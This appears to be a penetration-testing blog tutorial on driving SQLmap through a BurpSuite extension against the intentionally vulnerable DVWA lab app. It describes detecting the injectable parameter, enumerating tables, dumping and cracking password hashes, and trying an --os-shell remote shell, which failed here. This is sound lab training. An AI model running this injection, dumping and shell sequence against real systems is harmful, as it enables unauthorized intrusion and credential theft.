SQLmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws, and also taking over database servers. It comes with a powerful detection engine, and many features to help with the exploitation of SQL servers. You can use SQLmap to to access data from remote databases, access the underlying file system, and even execute remote code execution.
SQLmap has support for many different database systems including, but not limited to MySQL, Oracle, PostgreSQL, Microsoft SQL Server, etc. For this blog post I will be utilizing the training VM that was covered in a previous blog post.
For this post we will be focusing on a BurpSuite Extension that you can install called C02 (What a burp is comprised of? Get it?). This extension was developed by Jason Gillam, and contains multiple modules to enhance BurpSuite's capabilities. Once you find the extension in the BurpSuite App Store click the installation button in the bottom of the extension description window. Once installed an additional tab will be added to your BurpSuite top navigational bar.
To test the C02 extension we will be using the popular OWASP Damn Vulnerable Web App (DVWA). If you have already setup the training VM as described in the previous blog post you will be able to navigate to
http://dvwa.local and be presented with the screenshot shown below. If it is your first time navigating to DVWA a necessary setup check will be required first. Click the Create / Reset Database button at the bottom, and eventually the web application will redirect to the homepage.
In order to login to the DVWA application we will use the username:password of
DVWA is configured with multiple levels of security, and as your skill set increases you can adapt the application to provide harder challenges or extra hurdles to jump through in order to complete the exercises. For this blog post though I recommend navigating to the
DVWA Security tab in the right hand navigational menu. Then choosing the
Low setting, and clicking Submit.
Next navigate to the SQL Injection page located in the left navigational menu.
As you can see here you can type different entries into the input box and the web application will pass the search to the backend database for querying. If you type a 1 or 2 you will see an actual result of what the database will respond with.
The screenshot below provides a demonstration of intercepting the search request using the input box. This will be the request we want SQLmap to focus on.
Once the request is intercepted right click anywhere inside the request data window, and choose the Send to SQLMapper item.
BurpSuite should blink with the C02 extension to alert you that data has been added to the SQLMapper extension. Navigate to the tab C02 tab, and make sure you have the SQLMapper tab highlighted. The screenshot below should be similar to what you currently see. However, we will be changing a few additional options to help give some insight or additional attack vectors to the SQLMapper.
Since this web application is being hosted locally on our training VM we can turn up the Detection level. I recommend running the
Level: 3 and
Risk:3. The level and risk will increase the speed and intensity of the injections performed. If utilizing SQLmap on a production environment it is best to analyze the threshold at which you are willing to subject the application to in order not to cause a degradation of performance.
Under the Options tab we will start by only trying to enumerate the current database.
Next we will set the Proxy settings under the Connection tab. This is an optional step, but will allow us to view all the requests being made from BurpSuite. Also, if you have followed along with the ELK Stack blog post it will also allow for SQLmap to be logged my Elasticsearch.
Finally, we can navigate back to the main page of SQLMapper, and find our full command for SQLMap already generated. From here just copying and pasting this into a terminal running the SQLmap command will begin the injection process.
You will see the SQLmap banner as the injection enumeration process begins.
As you can see from the screenshot below it appears that the parameter
id appears to be injectable.
The screenshot below shows the progress of logging inside BurpSuite Logger++ extension.
After a few more tests, SQLmap returns that it believes the backend DBMS is
MySQL >= 5.5.
From this point we can continue to modify the original SQLmap command or we can continue to change the Options menu in the C02 extension. For this next step we can use SQLmap to dump the Tables of the MySQL database. Before we add the Tables selection under the Enumeration tab we should define the DBMS version under the detection. This is not necessary, but can help speed up the process of not requiring SQLmap to re-learn what is already discovered.
The screenshot below shows a sample of the output of the Database Tables.
SQLmap also provides built in functionality to try and dump passwords. It will perform multiple checks such as looking for cleartext passwords, but will also try and crack hashes if found as well.
The screenshot below shows the output of SQLmap using a default wordlist to try and crack the hashes discovered in the MySQL database.
Unfortunately, the default wordlist provided with SQLmap was not conclusive enough to crack the passwords but provided the hash output.
The final attack vector demonstrated is using SQLmap to execute remote code on the victim machine in order to obtain a interactive shell. Unfortunately, I have not found the injection point for a OS shell inside of C02, and thus we will just use the previous attack format. Adding the final parameter
--os-shell will signal for SQLmap to attempt to inject a shell code into a file on the remote machine and then call the file using SQL commands.
Walking through the question prompts we can answer the questions needed to inject code through SQLmap. The first question is what language to use. This needs to be the language the web application was written in. Using prior knowledge it was determined that the web application was written in PHP. Thus, we can leave the default selection. If all goes well at this point SQLmap should return an interactive shell.
I'm not sure if the os-shell fails because Docker is not configured with enough disk space to hold the shell or the www-data user does not have the correct write permissions on the disk. I will investigate later.
Time to SQLmap All The Things!